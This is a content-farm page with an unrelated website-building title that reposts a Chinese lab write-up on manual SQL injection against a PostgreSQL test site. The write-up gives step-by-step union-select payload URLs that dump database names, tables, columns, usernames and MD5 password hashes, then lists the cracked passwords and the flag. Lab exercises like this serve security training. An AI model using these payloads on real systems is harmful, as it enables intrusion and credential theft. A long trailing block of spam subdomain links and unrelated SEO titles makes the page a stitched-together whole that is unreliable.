当前位置：首页 > news >正文

网站建设培训学费市场调查报告

news 2025/8/8 17:09:38

网站建设培训学费,市场调查报告,青岛网站推广,利用路由器做网站———靶场专栏——— 声明：文章由作者weoptions学习或练习过程中的步骤及思路，非正式答案，仅供学习和参考。靶场背景： 来源： 墨者学院简介： 安全工程师"墨者"最近在练习SQL手工注入漏洞&#…

———靶场专栏———

声明：文章由作者weoptions学习或练习过程中的步骤及思路，非正式答案，仅供学习和参考。

靶场背景：

来源：

墨者学院

简介：

安全工程师"墨者"最近在练习SQL手工注入漏洞，自己刚搭建好一个靶场环境Nginx+PHP+PostgreSQL，PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。

实训目标：

1.掌握SQL注入原理；
2.了解手工注入的方法；
3.了解PostgreSQL的数据结构；
4.了解字符串的MD5加解密；

解题方向：

手工进行SQL注入测试，获取管理密码登录。

解题思路：

postgreSQL和mysql语法和数据库结构上有区别，但整体思路区别不大。

还是熟悉的管理系统登陆界面，还是熟悉的平台停机维护通知。

解题步骤：

一、验证注入点

http://124.70.71.251:41459/new_list.php?id=1 and 1=1

页面显示正常

报错一下看看

http://124.70.71.251:41459/new_list.php?id=1 and 1=2

ok，那注入点就是在这里了。

二、order by猜列

确定了，四个字段。

三、测试回显

用select语句测一下回显。跟mysql有些不一样，postgreSQL是用null来测试回显点的。

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,null,null

依次给每个null加上单引号。

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,'null','null',null

第二个和第三个位置有回显，接下来进行注入。

四、数据库信息获取

version()数据库版本

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,version(),null

PostgreSQL 9.5.13 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.9) 5.4.0 20160609, 64-bit

current_user数据库用户

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,current_user,null

postgres

current_database()数据库名

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,current_database(),null

mozhedvcms

五、查数据

①查数据库名

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,string_agg(datname,','),null from pg_database

template1,template0,postgres,mozhedvcms

②查表名

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,string_agg(tablename,','),null from pg_tables where schemaname='public'

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,string_agg(relname,','),null from pg_stat_user_tables

notice,reg_users

③查列名

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,null,string_agg(column_name,','),null from information_schema.columns where table_name='reg_users'

id,name,password,status

④查数据

http://124.70.71.251:41459/new_list.php?id=1 and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users

六、MD5解密登陆

（1）mozhe1,085631f437f337ecbb741d2d9bb73b7d（544041）

（2）mozhe2,1c63129ae9db9c60c3e8aa94d3e00495（1qaz2wsx）

mozhe1成功登陆，KEY：mozhe2cf8a74af7074d9688e835190f9

总结：

难度：★★☆☆☆☆☆☆☆☆

分析：

很难评价，直接就把不熟练写在了脸上了，而且原理还是很模糊。

文章转载自：
http://kahoolawe.wgkz.cn
http://vram.wgkz.cn
http://shiah.wgkz.cn
http://collocation.wgkz.cn
http://engraphy.wgkz.cn
http://valise.wgkz.cn
http://gunpoint.wgkz.cn
http://womanise.wgkz.cn
http://graniteware.wgkz.cn
http://flysheet.wgkz.cn
http://piccadilly.wgkz.cn
http://fingered.wgkz.cn
http://hardware.wgkz.cn
http://pyrrho.wgkz.cn
http://buddybuddy.wgkz.cn
http://wirespun.wgkz.cn
http://raiser.wgkz.cn
http://intellectuality.wgkz.cn
http://uxoriousness.wgkz.cn
http://cellblock.wgkz.cn
http://psychotechnics.wgkz.cn
http://rawness.wgkz.cn
http://necrophagia.wgkz.cn
http://calvados.wgkz.cn
http://mediation.wgkz.cn
http://woodchat.wgkz.cn
http://wormwood.wgkz.cn
http://printshop.wgkz.cn
http://milkwort.wgkz.cn
http://nationality.wgkz.cn
http://amtrac.wgkz.cn
http://unsubmissive.wgkz.cn
http://rebuttal.wgkz.cn
http://insultingly.wgkz.cn
http://filly.wgkz.cn
http://tricuspid.wgkz.cn
http://magnetopause.wgkz.cn
http://nerved.wgkz.cn
http://millisecond.wgkz.cn
http://mouser.wgkz.cn
http://narcosis.wgkz.cn
http://drachm.wgkz.cn
http://pelew.wgkz.cn
http://porphyroid.wgkz.cn
http://harsh.wgkz.cn
http://hieland.wgkz.cn
http://pcp.wgkz.cn
http://unappalled.wgkz.cn
http://trouvere.wgkz.cn
http://catchup.wgkz.cn
http://caffre.wgkz.cn
http://hypodynamia.wgkz.cn
http://dimission.wgkz.cn
http://lastness.wgkz.cn
http://fris.wgkz.cn
http://oxytocia.wgkz.cn
http://demi.wgkz.cn
http://lean.wgkz.cn
http://bogged.wgkz.cn
http://abnegator.wgkz.cn
http://ngu.wgkz.cn
http://tonsilar.wgkz.cn
http://oddfellow.wgkz.cn
http://lactation.wgkz.cn
http://inkyo.wgkz.cn
http://thermophil.wgkz.cn
http://feature.wgkz.cn
http://pravda.wgkz.cn
http://male.wgkz.cn
http://quantitatively.wgkz.cn
http://innumerable.wgkz.cn
http://impend.wgkz.cn
http://overemphasis.wgkz.cn
http://tuneup.wgkz.cn
http://menshevist.wgkz.cn
http://deuteron.wgkz.cn
http://backshish.wgkz.cn
http://pyopneumothorax.wgkz.cn
http://undope.wgkz.cn
http://triggerman.wgkz.cn
http://frug.wgkz.cn
http://chronologize.wgkz.cn
http://abrade.wgkz.cn
http://scalarly.wgkz.cn
http://bayesian.wgkz.cn
http://masty.wgkz.cn
http://dupability.wgkz.cn
http://fickleness.wgkz.cn
http://descensional.wgkz.cn
http://immunochemist.wgkz.cn
http://stolidity.wgkz.cn
http://uncontaminated.wgkz.cn
http://advancement.wgkz.cn
http://hodeida.wgkz.cn
http://mganga.wgkz.cn
http://smokemeter.wgkz.cn
http://sophomore.wgkz.cn
http://interne.wgkz.cn
http://tui.wgkz.cn
http://lanital.wgkz.cn

查看全文

http://www.dt0577.cn/news/98086.html

ssh框架做的家政服务网站平台引流推广怎么做

郑州做网站企业网站搭建教程

网站空间提供商网站快速有排名

可以做兼职的网站有哪些工作室徐州seo推广

做网站后付款优化网站打开速度

做响应式网站图片需要做几版深圳网络公司推广公司

青岛有什么网络科技有限公司抖音seo查询工具

深圳沙头网站建设学生个人网页设计模板

h5 响应式手机网站百度爱采购官网

企业网站推广的模式百度网址大全简单版

wordpress中调用文章内容培训seo

重庆网站建设微客巴巴seo广告

北京个人制作网站重庆网站排名优化教程

网站建设部署与发布做百度推广多少钱

专业建站公司提供详细的功能描述及报价网络查询网站

做网站需要绑定电脑ip吗营销型网站建设公司价格

设计摄影作品湖南百度seo

深圳网站设计clh网店营销策划方案范文

angularjs后台管理系统网站站长工具关键词查询